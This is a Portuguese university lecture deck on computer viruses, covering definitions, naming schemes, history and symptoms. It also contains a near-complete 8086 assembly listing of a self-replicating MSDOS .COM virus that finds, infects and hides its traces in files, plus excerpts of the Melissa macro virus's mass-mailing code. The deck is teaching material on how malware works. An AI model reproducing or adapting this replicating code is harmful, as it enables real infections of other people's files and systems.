Criptografia e Segurança das Comunicações. Virus informáticos

Tamanho: px
Começar a partir da página:

Download "Criptografia e Segurança das Comunicações. Virus informáticos"

Transcrição

1 Criptografia e Segurança das Comunicações Virus informáticos Virus : 1/47 Definições (1) Virus: segmento de código (200B-4KB), que se copia num programa hospedeiro ( host ), quando este é activado. Nota: os virus não infectam ficheiros de dados, embora alguns possam ser interpretados (ex: pelo Outlook Express). Cavalo de Troia ( Trojan horse ): programa com funções, frequentemente destrutivas, não conhecidas pelo utilizador Bomba temporal: funções activadas por data Bomba lógica: funções activadas por condições Verme ( Worm ): programa que se duplica a si próprio, sem infectar outros. Os vermes replicam-se na Internet, sobrecarregando-a. Virus : 2/47

2 Definições (2) Spyware programas que reconhem informação (comandos, senhas de passe, ) que é enviada pela Internet. CM2 ( Malicious Mobile Code ): programas desenhados para se moverem entre computadores, por redes, a fim de modificar sistemas sem conhecimento dos operadores. SPAM 1 correio não solicitado. 1 Marca de carne enlatada, da empresa Hormel, acrónimo de Shoulder of Pork and ham. Virus : 3/47 Identificação de virus (1) As identificações iniciais usavam critérios ad-hoc, uma vez que os criadores são frequentemente desconhecidos. Local onde foi detectado pela 1ª vez (ex: Leigh, Alameda). Cadeia de caracteres existente no código (ex: Brain, Melissa, AnaKournikova) Numero de Bytes de incremento do programa infectado (ex: 1704, 1280) Associações extemporânias (Code Red é uma bebida energética que os analistas tomaram na altura do combate ao virus) Virus : 4/47

3 Identificação de virus (2) A descrição dos virus detectados mensalmente publicada em Em 1991, a CARO-Computer Antivirus Research Org, adoptou uma metologia para as designações Formato: Familia.Grupo.VarMaior.VarMenor.Modificador Campos cada vez mais específicos, sendo obrigatórios à esquerda Exemplo: W97.Melissa.AA Primeira variante Word 97 Macro Virus : 5/47 Identificação de virus (3) Código de algumas famílias de virus Prefixo BAT Boot HLL TRO W32 W64 WM XM Descrição DOS batch sector boot do DOS Linguagem de programação (Java, JS-JavaScript, VBS- Visual Basic Script) Cavalo de Troia Todas as plataformas Windows 32 (Win 2000,NT,XP) Plataforma Windows IA64 Word macro Excel macro Virus : 6/47

4 História (1) Curiosidade, não faz parte da avaliação [Nov83] Fred Cohen, estudante de Doutoramento em EE na University of Southern California, imagina, numa disciplina sobre segurança, um programa que tome conta de um computador. Implementa-o num VAX 11/470, a correr Unix, que toma conta dele numa hora 1. O orientador, Prof. Adelman, sugere o nome de virus. [1982] Primeiro virus conhecido, no sector boot de uma diskette do Apple II contendo o jogo Elk Cloner. No 50º boot imprime uma mensagem no terminal. [Jan85] Primeiras infecções em PCs: Leigh-Universidade onde Cohen ensinava, e o cavalo de Troia Brian-produzido no Paquistão (autores indicados no código). [1987] Detectado o virus Jerusalem na Hebrew University, que aumenta sempre ficheiros.com e.exe e destroi todos os programas a correr na 6ª-feira, 13. Primeiro virus a atrair atenção na comunicação social. 1 Fred Cohen, Computer Viruses-Theory and Experiments, Computers & Security: 6(1), Virus : 7/47 História (2) Curiosidade, não faz parte da avaliação [Nov88] Primeiro verme detectado, Morris Internet Worm, afectando VAX e Sun3 com Unix 4 BSD. [89-92] Geração de vários virus em Sofia/Bulgária, incluindo o DAME (Dark Avenger s Mutating Engine, ou MTE, uma ferramenta de apoio à geração de novos virus). [Ago95] MicroSoft distribui, a centenas de produtores de software, o CD Windows 95 Software Compatability Test com o virus WM.Concept [Jun97] Publicado programa winnuke.c, que envia para o porto 139 lixo e o Win95 do outro lado crasha. [Ago98] Lançado o primeiro virus de Java, o Strange Brew. [1999] Lançado primeiro spyware no jogo gratuito Elf Bowling. [Mar99] Lançado o primeiro verme de , o Melissa. Virus : 8/47

5 História (3) Curiosidade, não faz parte da avaliação [Jun00] Cavalo de Troia Timfonica, em Visual Basic, infecta na Espanha PCs para enviar mensagens a telemóveis: para além do manifesto anti-monopólio, apaga parameterizações. [Jul01] O verme Code Red replicou-se mais de 250 mil vezes, em 9 horas, no dia 21 de Julho. [Set01] Lançado o primeiro cavalo de Troia contra o Palm OS, o Liberty crack. [Jan03] O verme W32.Slam, explorando uma falha no servidor SQL da MicroSoft, arrancou em Hong-Kong no dia 25 de Janeiro e bloqueou 5 dos 13 servidores da Internet em 15 minutos. Tinha apenas 376B! [Mai04] Lançado o primeiro virus conceptual do Win64, o W64.Rugrat.3344 [Jul07] Lançado verme W32.Deletemusic, que elimina todos os ficheiros MP3. Virus : 9/47 Efeitos de virus (1) Graves prejuizos economicos na quebra do desempenho da Internet (ex: o Slammer causou prejuízos estimados em 2 biliões de USD-a Continental Airlines teve de encerrar o hub de Newark). Criação de muitas empresas de eliminação de virus (McAFee, Norton, Panda, ). Incentivam desenvolvimento de protecções ( Firewalls, ) e descoberta/ eliminação de falhas ( loopholes ). Os virus/vermes têm sido sido detectados em muitos ambientes Microcomputadores (MSDOS, Windows, Macintosh, ) Routers da Internet Telemóveis, PDAs Virus : 10/47

6 Efeitos de virus (2) Curiosidade, não faz parte da avaliação Em 2007 encontravam-se registados 1.1 milhões, muitos deles variantes (relatório Symantec). Diversos estados (EUA,GB,* ) publicaram leis contra a produção e difusão de virus. Já foram condenados criadores de virus/vermes [Mai95] Primeiro condenado na GB pela criação de virus, a 18 meses de detenção. [Fev98] Criador do Morris Internet Worm suspenso, durante 1 ano, da Cornell University de Ithaca/NY. [Set01] Criador do ou AnaKournikova, condenado na Holanda a 75 dias de prisão. * Portugal em Outubro Virus : 11/47 Efeitos de virus (3) Curiosidade, não faz parte da avaliação [Mai02] Criador do Melissa condenado, no estado de New Jersey, a 20 meses de prisão. [Jul04] Criador do cavalo de Troia W32.Carbonator condenado, em Espanha, a 2 anos de prisão. O virus foi disponibilizado numa pagina Web com instruções para seu uso: uma vez carregado, permitia ao criador do Carbonator aceder aos dados do computador infectado. [Abr05] Criador de distribuidor de spam, Jeremy Janes, condenado a 9 anos de prisão no estado de Virginia. [Jan06] James McCalla condenado por tribunal de Illinois a pagar 11.2 biliões de USD a Midwest ISP, por envio de 280 milhões de spam. Virus : 12/47

7 Efeitos de virus (4) Sintomas de infecções virais Alterações inesperadas do comprimento de ficheiros (especialmente executáveis). Programas a demorar mais tempo a iniciar, ou correr mais lentamente. Tentativas, sem razão aparente, de escrita em meio writeprotected. Diminuição inesperada de memória de disco, ou aumento de badsectors nos discos. Ficheiros a desaparecer, ou serem criados, misteriosamente. Reboot inesperado com programas correctos a executar. Carga anormal de redes locais, especialmente quando cópias multiplas dos mesmos dados são enviados. Virus : 13/47 Etapas de um virus (1) As etapas mais importantes na vida de um virus são: Activação Replicação ( spread ) Manipulação (opcional, ex: alteração de dados no disco, mensagens no ecran, reboot, ) Nota 1: Os criadores de virus pretendem que a activação e a replicação sejam automáticas e invisíveis (sem intervenção directa, nem conhecimento do operador). Nota 2: Um verme não necessita da intervenção do operador para se replicar. Virus : 14/47

8 Etapas de um virus (2) Os sistemas operativos iniciais (MSDOS, ), muito simples, não possuiam protecções contra virus. Sistemas operativos mais protegidos (Win32,MacOS, ), não são invioláveis: apesar de mais complexos, falhas continuam a ser exploradas. Nesta disciplina são analisados, com algum detalhe, alguns virus/vermes Brain, Melissa Morris Internet Worm, Slammer Nesta disciplina é implementado em MSDOS um vírus informático inofensivo. Virus : 15/47 Formas de adição no hospedeiro Incremento ( add-on ): o virus é inserido no fim, ou no início do hospedeiro, e o arranque do hospedeiro é alterado por forma que o virus seja executado primeiro. É a forma mais seguida pelos criadores de virus. Concha ( shell ): o virus torna-se o programa principal e o hospedeiro torna-se subrotina do virus. Intrusivo: parte do código do hospedeiro é substituído pelo virus. Virus : 16/47

9 MSDOS: Activação A activação pode ser feita Automaticamente no arranque do sistema: activação ocorre sempre! No programa infectado (.COM ou.exe): activação só ocorre quando o programa infectado é activado. O MSDOS, ao carregar um programa (.COM ou.exe), cria na base um espaço de 0100H denominado PSP-Program Segment Prefix. Diferenças nos formatos dos ficheiros de boot,.com e.exe levam que os virus sejam específicos a ficheiros tipo e a sistema operativo. Nesta disciplina são abordadas duas formas de replicação: Ficheiro.COM Macros Virus : 17/47 Replicação COM-memória (1) Nos ficheiros.com, código, dados e pilha estão no mesmo segmento (logo, obrigatoriamente menores que 64KB). Os programas podem ser colocados em qualquer endereço da zona de RAM denominada TPA-Transient Program Area. Início do programa 64K PSP Código + Dados.COM Virus TPA A Basic Virus Writing Primer, Chili, Assembly Programming Journal 1(4) Apr 1999 Virus : 18/47

10 Replicação COM-memória (2) No MSDOS, programas.com ou.exe são colocados depois do PSP-Program Segment Prefix (0100H) Depois de carregado o ficheiro.com, o MSDOS inicializa os seguintes registos antes de iniciar a execução AX = BX = CX = DX = 00000H BP = 0100H SP = 0FFFFH DS,ES,SS,CS = segmento onde é instalado o programa IP = 0100H Virus : 19/47 Replicação COM-int 21h (1) Curiosidade, não faz parte da avaliação Operações sobre ficheiros com INT 21h e função no AH Cod. Objectivo Parâmetros Retorno 01H Lê caractere do teclado --- AL-caractere 02H Escreve caractere na consola DL-caractere H Imprime cadeia de caracteres DS:DX-endereço de cadeia (1) H Lê caractere do teclado sem ecoar --- AL-caractere 1AH Transferir local do DTA DS:DX-novo endereço --- 3DH Abertura de um ficheiro AL-modo de acesso DS:DX-endereço de nome (2) Sucesso c/ carry=0 AX-descritor fich 3EH Fecho de um ficheiro BX-descritor ficheiro Sucesso c/ carry=0 1) cadeia de caracteres terminada por $ 2) cadeia de caracteres terminada pelo Byte 0 Virus : 20/47

11 Replicação COM-int 21h (2) Curiosidade, não faz parte da avaliação Cod. Objectivo Parâmetros Retorno 3FH Leitura de um ficheiro BX-descritor ficheiro CX-numero Bytes a ler DS:DX-endereço de memória Sucesso c/ carry=0 AX-Bytes lidos 40H Escrita de um ficheiro BX-descritor ficheiro Sucesso c/ carry=0 CX-numero Bytes a escrever AX-Bytes escritos DS:DX-endereço de memória 42H Alterar posição no fich AL-origem do movimento BX-descritor ficheiro CX,DX-deslocamento 43H Obter/alterar atributos AL-00(get), 01(set) CX-atributos Sucesso c/ carry=0 DX,AX-deslocamento efectuado Sucesso c/ carry=0 CX-atributos (se AL=0) Virus : 21/47 Replicação COM-int 21h (3) Curiosidade, não faz parte da avaliação Cod. Objectivo Parâmetros Retorno 4CH Termina programa AL-código retorno --- 4EH Procura primeiro ficheiro numa directoria CX-tipo de ficheiro DS,DX-endereço da template Sucesso c/ carry=0 DTA 4FH Procura ficheiro seguinte DS,DX- template anterior Sucesso c/ carry=0 57H (3) Obter/alterar data de última alteração AL-00(get), 01(set) BX- descritor ficheiro DX-data, CX-hora (se AL=01) Sucesso c/ carry=0 DX-data CX-hora (se AL=00) 3) Só para MSDOS 4+ Virus : 22/47

12 Replicação COM-int 21h (4) 43B 00H 15H 16H 18H 1AH 1EH reservado Estrutura do DTA preenchido pela função 4EH atributos do ficheiro hora data dimensão do ficheiro nome do ficheiro 2AH Nota: DTA pode igualmente guardar a linha de comandos, nesse caso são necessários 128B Virus : 23/47 Replicação COM-passos (1) Um virus.com, infecta outro ficheiro seguindo os passos 1. Copia, para o fim do ficheiro a infectar, o código 2. Copia para o novo final, os 3 primeiros Bytes do ficheiro a infectar. 3. Substitui os 3 primeiros Bytes por um JUMP para o código viral. 4. No final do código viral: Obtém o endereço do PSP, pelo INT 21H-função 062H. Copia os 3 Bytes salvaguardados para PSP+0100H Executa um JUMP para PSP+0100H Virus : 24/47

13 Replicação COM-passos (2) Para que o utilizador não desconfie dos acessos, os criadores de virus seguem os seguintes passos: Se o alvo estiver write-protected, retirar a protecção e restabelecê-la no fim. Antes de escrever no ficheiro alvo, guardar a data da última modificação, e restaurar a data depois de escrever no ficheiro alvo. Virus : 25/47 Replicação COM-variáveis (1) Problema: Nas instruções de salto, os endereços são relativos ao 1º Byte depois da instrução. Em Asm86, os endereços das variáveis são absolutos, dentro de DS. No entanto, a posição dos dados da parte viral depende do hospedeiro. Como saber a posição das variáveis (exemplo, para guardar os 3 Bytes iniciais do ficheiro a infectar)? Código Dados Código Dados Hosp. A Hosp. A virus virus Código Dados Código Dados Hosp. B Hosp. B virus virus Virus : 26/47

14 Replicação COM-variáveis (2) Solução: O código dos virus é de tamanho sempre igual, e as variáveis do virus estão depois do código. Assim, o código do vírus tem de recolher no início o deslocamento relativo da sua parte de código. Start_virus: chama a instrução seguinte, logo IP é carregado na pilha call Here Here: pop bp recolhe endereço para o BP sub bp, offset Here subtrai espaço da parte inicial(call Here) No código do virus, as suas variáveis são sempre acedidas por endereçamento base na forma [BP+offset var] Deslocamento da variável dentro do virus Deslocamento no hospedeiro Virus : 27/47 Replicação COM-restauro O hospedeiro tem os 3 primeiros Bytes, em 100h, substituidos pelo salto para o código do virus. O virus alterar os 3 primeiros Bytes duas vezes ao infectar um programa, começa por guardar o conteúdo dos 3 primeiros Bytes desse programa na variávelfst_three. No final o virus restabelece esses 3 Bytes, com instruçõesmovs, para que depois o programa original possa ser executado sem que o utilizador suspeite da infecção. mov di,100h [ES]:DI aponta destino push di lea si,[bp+offset fst_three] cld movsb movsw reset direction flag para incrementos no DI e SI Virus : 28/47

15 Replicação COM-código (1).model tiny modelo.com.code org 100H deixa espaço para PSP Start: db 0E9H instrução de salto dw 0 no lançador é zero, noutros casos determina-se depois Obtem, no BP, o espaço do hospedeiro Start_virus: call Here Here: pop bp sub bp, offset Here Restaura 3 primeiros Bytes do hospedeiro mov di,100h [ES]:DI aponta destino push di lea si,[bp+offset fst_three] cld movsb movsw reset direction flag para increments no DI e no SI Virus : 29/47 Replicação COM-código (2) No PSP, a área acima de 80H (DTA-Disk Transfer Area) é usada pelo INT 21 para guardar dados. No arranque do programa, em 80H estão guardados os parâmetros da linha de comando. Logo, o virus tem de guardar esses dados antes de qualquer acesso a disco. lea dx,[bp+offset dta] $Set_dta Virus : 30/47

16 Replicação COM-código (3) Procura um ficheiro para infectar mov ah,4eh Find_next: lea dx,[bp+offset template] mov cx,3fh todos os tipos de ficheiro int 21h jnc Found_one jmp Quit Abre ficheiro alvo Found_one: mov al,0 recolhe atributos $Get_set_attrib mov [bp+offset file_attrib],cx test cx,1 je Attrib_ok está em write-protected, tem de alterar modo de acesso dec cx mov al,1 $Get_set_attrib Attrib_ok: mov ah,3dh mov leitura/escrita al,2h acesso int 21h jnc Opened call restabelece atr Restore_attrib falhou, mov ah,4fh tenta outro jmp Find_next Virus : 31/47 Replicação COM-código (4) Opened: xchg ax,bx desloca descritor para BX Lê data da última alteração do ficheiro mov al,0 $Get_set_date mov [bp+offset time],cx mov [bp+offset date],dx Lê e guarda 3 primeiros Bytes mov ah,03fh lea dx,[bp+offset fst_three] mov cx,3 int 21h jnc Check_size call Restore_date mov ah,4fh tenta outro jmp Find_next Virus : 32/47

17 Replicação COM-código (5) Problema: Os virus.com possuem o inconveniente de provocar o aumento do programa (ex: o virus Jerusalem não tinha assinatura, e cada infecção aumenta o programa em 1813B). Não há interesse em infectar um hospedeiro já infectado. Solução: Verificar se o ficheiro já foi infectado, comparando dimensões do virus (código + dados). Virus : 33/47 Replicação COM-código (6) Check_size: se tamanho dos dois ficheiros for igual, o alvo já deve estar infectado mov ax,word ptr[bp+offset F_Size] mov cx,word ptr[bp+offset fst_three+1] add cx,end_virus-start_virus+3 cmp ax,cx jnz Uninfected call Restore_date mov ah,4fh tenta outro jmp Find_next Yum-yum, um candidato à infecção! Vamos a ele. Uninfected: calcular deslocamento para o JMP no ficheiro alvo sub ax,3 mov word ptr [bp+offset jmp_offset],ax Virus : 34/47

18 Replicação COM-código (7) Posiciona-se no inicio do fich alvo mov al,0h $Move_file_ptr Escreve 3 primeiros Bytes mov cx,3 lea dx,[bp+offset jmp_inst] $Write_to_file jnc Copy call Restore_date mov ah,4fh tenta outro jmp Find_next copia virus Copy: mov al,2 posicionar no fim $Move_file_ptr copiar o corpo principal do virus mov cx,end_virus-start_virus lea dx,[bp+offset Start_virus] $Write_to_file Restabelece DTA e data do hospedeiro mov dx,80h $Set_dta call Restore_date Virus : 35/47 Replicação COM-código (8) Restaura registos e regressa ao programa infectado mov ax,0 mov bx,0 mov cx,0 mov dx,0 mov bp,0 mov si,0 mov di,0 retn NOTA:ORDEM DAS ROTINAS Restore_date, Restore_attrib, Close NÃO PODE SER ALTERADA Restore_date: restaura data/dia mov al,01h mov cx,[bp+offset time] mov dx,[bp+offset date] $Get_set_date Restore_attrib: restaura atributos mov cx,[bp+offset file_attrib] mov al,1 $Get_set_attrib Close: fecha alvo mov ah,03eh int 21h retn Virus : 36/47

19 Replicação COM-código (9) DADOS A RESIDIR NO FICHEIRO ALVO template db "disp?.com",0 fst_three db 0cdh,20h,0 INT 20 virus_name db "[Demo]",0 author db "Nobody",0 jmp_inst End_virus equ $ db 0e9h Manter ordem nas declarações de dados! DADOS A RESIDIR NO FICHEIRO INFECTADO jmp_offset dw? dta: Reserv F_Attr db? F_Time dw? F_Date dw? db 21 dup(?) F_Size dd? F_Name db 13 dup(?) date dw? time dw? file_attrib dw? _code ends end _start Virus : 37/47 Replicação COM-código (10) MACROS $Write_to_file MACRO mov ah,40h int 21h ENDM $Set_dta MACRO mov ah,1ah int 21h ENDM $Get_set_attrib MACRO lea dx,[bp+offset dta+1eh] mov ah,43h int 21h ENDM $Get_set_date MACRO mov ah,57h int 21h ENDM $Move_file_ptr MACRO mov cx,0 mov dx,0 mov ah,42h int 21h ENDM Virus : 38/47

20 Virus por macros (1) Diversas ferramentas permitem processar dados, por macros. As macros, escritas em linguagens de alto nível (mais fáceis de usar), podem ser associadas aos ficheiros. Os dados são enviados em diskettes, CDs ou pela Internet ( , ftp, WWW) A ferramentaoutlook Express processa macros inseridos no . A ferramentaword (Excel) processa macros inseridas em documentos (folhas de cálculo). Algumas macros podem ser executadas automaticamente pela ferramenta, sem conhecimento directo do utilizador. Virus : 39/47 Virus por macros (2) Em 1993, a Microsoft passou a usar a linguagem de macros VBA - Visual Basic for Applications para empresas adaptarem aplicações da MS (Word, Excel, Outlook, FrontPage, ). Listagem de macros efectuada no menu Tools, comando Macro (Alt-F8). Edição de macros efectuada pelovisual Basic Editor (Alt-F11). Virus : 40/47

21 Virus por macros (3) Ciclo de vida As etapas dos virus por macros são semelhantes às etapas dos virus de código: activação, replicação e manipulação. 1. Utilizador abre o documento infectado. 2. Ferramenta carrega as macros. 3. Macros são automaticamente executadas, contendo instruções de replicação. Por exemplo, o documento infectado é enviado por a endereços armazenados no computador. Virus : 41/47 Virus por macros (4) Curiosidade, não faz parte da avaliação Virus Melissa W97M virus, lançado em Março de 99. Macro designado por Melissa Registo HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa? fica com valor Kwyjibo, para o virus confirmar se o PC já se encontra infectado Procura 50 endereços de , enviando mensagem infectada {user name} do PC infectado Subject: Important Message From {user name} Conteúdo: Here is that document you asked for... don't show anyone else :-) Attachment: documento activo infectado Virus : 42/47

22 Virus por macros (5) Curiosidade, não faz parte da avaliação Se dia e minuto forem iguais (ex: dia 30 às 0:30), insere na corrente localização do documento a frase Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here. cria instância do Outlook SET UngaDasOutlook = CreateObject("Outlook.Application") verifica se computador ainda não foi infectado IF System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\","Melissa") <> "... by Kwyjibo" THEN verifica se o servidor de é o Outlook IF UngaDasOutlook="Outlook" THEN Virus : 43/47 Virus por macros (6) Curiosidade, não faz parte da avaliação recolhe identificador do utilizador e passwd DasMapiName.Logon "profile" "password" recolhe endereços armazenados FOR y=1 TO DasMapiName.AddressLists.Count SET AddyBook = DasMapiName.AddressLists(y) x = 1 SET BreakUmOffASlice = UngaDasOutlook.CreateItem(0) FOR oo=1 TO AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x +1 IF x>50 THEN oo= AddyBook.AddressEntries.Count NEXT oo envia infectado Virus : 44/47

23 Virus por macros (7) Curiosidade, não faz parte da avaliação Depois, o virus verifica o documento activo é normal ou um padrão Normal.dot. Se for documento normal, infecta o padrão Normal.dot com a macro Document_Close (a correr sempre que o documento é fechado). Se for o padrão Normal.dot, infecta o documento activo com a macro Document_Open (a correr sempre que o documento é aberto). O Word trabalha sobre dois tipos de ficheiros: Documento propriamente dito (.doc) Padrão ( template ), com as formatações/margens/ O padrão Normal.dot, é o de omissão do Word e é alvo favorito dos criadores de virus. Virus : 45/47 Assinaturas Para evitar multiplas infecções, os virus possuem mecanismos de reconhecimento. Existem dois locais onde são inseridas assinaturas: Ficheiro: cadeias específicas ( scan strings ) em locais designados Memória: na activação são instaladas funções próprias do virus (ex: Cascade tem função no endereço 04BFFH, devolve 055AH no registo DI). Os mecanismos de reconhecimento são uma preciosa ajuda para os detectores de virus. Virus : 46/47

24 Regras básicas para evitar virus Não abrir estranhos. Desconfiar de sites gratuitos. Instalar programas apenas de vendedores seguros. Configurar bloqueador popup no navegador (Firefox, IE, Google Toolbar). Usar e manter actualizado um AV. MacAfee, Panda,... Actualizar periodicamente definições de virus (melhor ainda, configurar Live update) Virus : 47/47

Software de Telecomunicações. Virus informáticos:1ª parte

Software de Telecomunicações. Virus informáticos:1ª parte Software de Telecomunicações Virus informáticos:1ª parte Prof RG Crespo Software de Telecomunicações Virus-I : 1/59 Descrição do módulo Parte I Introdução aos virus Infecção de virus em MSDOS Parte II

Leia mais

Software de Telecomunicações. Ferramentas de protecção. Prof RG Crespo Software de Telecomunicações Protecção : 1/15

Software de Telecomunicações. Ferramentas de protecção. Prof RG Crespo Software de Telecomunicações Protecção : 1/15 Software de Telecomunicações Ferramentas de protecção Prof RG Crespo Software de Telecomunicações Protecção : 1/15 Detecção de virus (1) No mercado existem programas dedicado à detecção e erradicação de

Leia mais

Definição DSPTI II. Surgimento - Brasil

Definição DSPTI II. Surgimento - Brasil Definição DSPTI II Vírus e Anti-Vírus Prof. Alexandre Beletti Vírus de computador são programas desenvolvidos para causar, geralmente, algum tipo de dano ao computador, como cópia exclusão de arquivos,

Leia mais

Interface Hardware/Software. Centro de Informática - UFPE Paulo Maciel prmm@cin.ufpe.br

Interface Hardware/Software. Centro de Informática - UFPE Paulo Maciel prmm@cin.ufpe.br Interface Hardware/Software Centro de Informática - UFPE Paulo Maciel prmm@cin.ufpe.br Interrupção INT 1Ah Ler o Relógio; Atualizar o Relógio; Ler a Data; Atualizar a Data. 2 Interrupção - INT 1Ah Ler

Leia mais

INT 5h - Print screen Modo Resolução Caract. INT 10h - Vídeo INT 10h - Vídeo

INT 5h - Print screen Modo Resolução Caract. INT 10h - Vídeo INT 10h - Vídeo BIOS Basic Input/Output System BIOS e System Calls Prof. Eduardo Tavares eagt@cin.ufpe.br Primeira instrução a ser executada (0xFFFF0-0xFFFFF) Configuração inicial do sistema Inicialização do boot loader

Leia mais

Laboratório de Sistemas Processadores e Periféricos Lista de comandos de Assembly

Laboratório de Sistemas Processadores e Periféricos Lista de comandos de Assembly Laboratório de Sistemas Processadores e Periféricos Lista de comandos de Assembly Gustavo G. Parma Lista dos comandos assembly que serão utilizados ao longo das práticas. 1 Comandos 1. ADD destino, fonte

Leia mais

Os 3 principais tipos de Instruções (INSTRUTION SET) dos up são:

Os 3 principais tipos de Instruções (INSTRUTION SET) dos up são: Linguagem Assembly Os 3 principais tipos de Instruções (INSTRUTION SET) dos up são: INSTRUÇÕES DE TRANSFERÊNCIA DE DADOS - Movem dados entre Registradores, Registradores e Memória e Valores Fixos para

Leia mais

LIÇÃO: Segurança Informática Reconhecimento de Vírus e Acção

LIÇÃO: Segurança Informática Reconhecimento de Vírus e Acção LIÇÃO: Segurança Informática Reconhecimento de Vírus e Acção Idade-alvo recomendada: 11 anos Guia da lição Os alunos irão desenvolver uma compreensão básica de problemas de segurança online e prevenção

Leia mais

Vírus e outras ameaças

Vírus e outras ameaças Vírus e outras ameaças Vírus Computacionais computacional/biológico O termo vírus computacional deriva e é de alguma forma análogo ao vírus biológico Infecções virais biológicas são propagadas através

Leia mais

Questões de Informática Banca CESPE - Ano: 2010 Caderno 2 Fontes: Provas da Banca CESPE

Questões de Informática Banca CESPE - Ano: 2010 Caderno 2 Fontes: Provas da Banca CESPE 1. ( ) Um computador pode ser protegido contra vírus por meio da instalação de software específicos como, por exemplo, Norton Anti-virus, McAfee Security Center e AVG, que identificam e eliminam os vírus.

Leia mais

x86 Assembly Mini-Course

x86 Assembly Mini-Course x86 Assembly Mini-Course Part 1 Bruno P. Evangelista bpevangelista@gmail.com Introdução Assembly é uma linguagem de programação de baixo nível em formato mnemonico Ela possibilita trabalhar diretamente

Leia mais

LABORATÓRIO DE LINGUAGEM DE MONTAGEM. MACROS e GERENCIAMENTO DE MEMÓRIA

LABORATÓRIO DE LINGUAGEM DE MONTAGEM. MACROS e GERENCIAMENTO DE MEMÓRIA LABORATÓRIO DE LINGUAGEM DE MONTAGEM MACRO: MACROS e GERENCIAMENTO DE MEMÓRIA Capítulos 13 e 14 do livro-texto, págs. 257 a 308 é um bloco de texto que recebe um nome especial consiste de instruções, diretivas,

Leia mais

1.5. Computador Digital --Software. INFormática. 1.5.1. Tipos de Software. Software. Hardware. Software do Sistema. Software de Aplicação.

1.5. Computador Digital --Software. INFormática. 1.5.1. Tipos de Software. Software. Hardware. Software do Sistema. Software de Aplicação. 1.5. Computador Digital --Software 1.5.1. Tipos de Software Utilizador Aplicações Linguagens Programação Software Sistema Operativo Hardware Software de Aplicação Processadores de Texto Folhas de Cálculo

Leia mais

Introdução à Informática

Introdução à Informática Introdução à Informática Noções Básicas de Informática Componentes de hardware Monitor : permite visualizar informação na forma de imagem ou vídeo; todo o trabalho desenvolvido com o computador pode ser

Leia mais

Universidade do Algarve Faculdade de Ciências e Tecnologia Área Departamental de Engenharia Electrónica e Computação

Universidade do Algarve Faculdade de Ciências e Tecnologia Área Departamental de Engenharia Electrónica e Computação Universidade do Algarve Faculdade de Ciências e Tecnologia Área Departamental de Engenharia Electrónica e Computação Periféricos e Interfaces 2003/2004 Cursos de Informática e Ensino de Informática Exame

Leia mais

Segurança no Computador

Segurança no Computador Segurança no Computador Segurança na Internet: Módulo 1 (CC Entre Mar E Serra), 2008 Segurança na Internet, CC Entre Mar E Serra 1 Segurança no Computador Um computador (ou sistema computacional) é dito

Leia mais

CONCEITOS GERAIS SOBRE SEGURANÇA NA TECNOLOGIA DA INFORMAÇÃO. Prof. Me. Hélio Esperidião

CONCEITOS GERAIS SOBRE SEGURANÇA NA TECNOLOGIA DA INFORMAÇÃO. Prof. Me. Hélio Esperidião CONCEITOS GERAIS SOBRE SEGURANÇA NA TECNOLOGIA DA INFORMAÇÃO Prof. Me. Hélio Esperidião CONCEITOS GERAIS SOBRE SEGURANÇA NA TECNOLOGIA DA INFORMAÇÃO O conceito de segurança envolve formas de proteção e

Leia mais

PLANO DA LIÇÃO Princípios Básicos de Segurança do Computador

PLANO DA LIÇÃO Princípios Básicos de Segurança do Computador PLANO DA LIÇÃO Princípios Básicos de Segurança do Computador Idade Recomendada: 10 anos Guia da Lição Os alunos desenvolverão uma compreensão básica das questões de segurança virtual que levantam os vermes,

Leia mais

Por razões de segurança não guardamos as passwords (palavra-passe) dos acessos aos sites. Será necessário gerar uma nova password.

Por razões de segurança não guardamos as passwords (palavra-passe) dos acessos aos sites. Será necessário gerar uma nova password. 1 de 7 11-11-2010 09:17 Painel de Administração cpanel Instruções Iniciais Estamos muito gratos por ter escolhido alojar o seu site na IBERWEB. Em caso de dúvidas, por favor contacte de imediato o nosso

Leia mais

GENERALIDADES SOBRE ANTI-VÍRUS

GENERALIDADES SOBRE ANTI-VÍRUS Índice GENERALIDADES SOBRE ANTI-VÍRUS... 2 Contaminação... 3 Detecção de vírus... 4 Algumas formas de evitar Vírus... 4 Worms... 5 Variantes... 5 Trojan Horse (Cavalo de Tróia)... 6 Spywares... 7 GENERALIDADES

Leia mais

paulo_magalhães/tiago_gala TIC IPSB 10B 2004/2005 virus

paulo_magalhães/tiago_gala TIC IPSB 10B 2004/2005 virus paulo_magalhães/tiago_gala TIC IPSB 10B 2004/2005 virus I n t r o d u ç ã o O que são? Um vírus de computador é geralmente um programa que realiza certas tarefas, nos computadores dos utilizadores cujos

Leia mais

Periféricos e Interfaces Ano lectivo 2003/2004 Docente: Ana Paula Costa. Aula Teórica 12

Periféricos e Interfaces Ano lectivo 2003/2004 Docente: Ana Paula Costa. Aula Teórica 12 Sumário: A tabela de partições do disco rígido. A root directory. A FAT. Os serviços BIOS para disco. Aula Teórica 12 Leitura Recomendada: Capítulos 28 e 29 - Hans-Peter Messmer, The Indispensable PC Hardware

Leia mais

Algumas informações sobre a rede informática do ISA

Algumas informações sobre a rede informática do ISA Algumas informações sobre a rede informática do ISA Fernanda Valente Graça Abrantes A grande maioria dos computadores do Instituto Superior de Agronomia estão ligados entre si constituindo uma Intranet,

Leia mais

7. Instruções lógicas, de deslocamento e de rotação

7. Instruções lógicas, de deslocamento e de rotação 7. Instruções lógicas, de deslocamento e de rotação São instruções que permitem mudar o padrão de bits num byte (8 bits) ou numa palavra (16 bits). Linguagens de alto nível (exceto C) não permitem manipular

Leia mais

Consulte a contra-capa para uma instalação rápida.

Consulte a contra-capa para uma instalação rápida. Manual do Utilizador Consulte a contra-capa para uma instalação rápida. Protegemos mais pessoas das crescentes ameaças on-line do que qualquer outra empresa no mundo. Preocupa-se com o nosso Ambiente,

Leia mais

OBJETIVO DA POLÍTICA DE SEGURANÇA

OBJETIVO DA POLÍTICA DE SEGURANÇA POLÍTICA DE SEGURANÇA DIGITAL Wagner de Oliveira OBJETIVO DA POLÍTICA DE SEGURANÇA Hoje em dia a informação é um item dos mais valiosos das grandes Empresas. Banco do Brasil Conscientizar da necessidade

Leia mais

Introdução à Internet

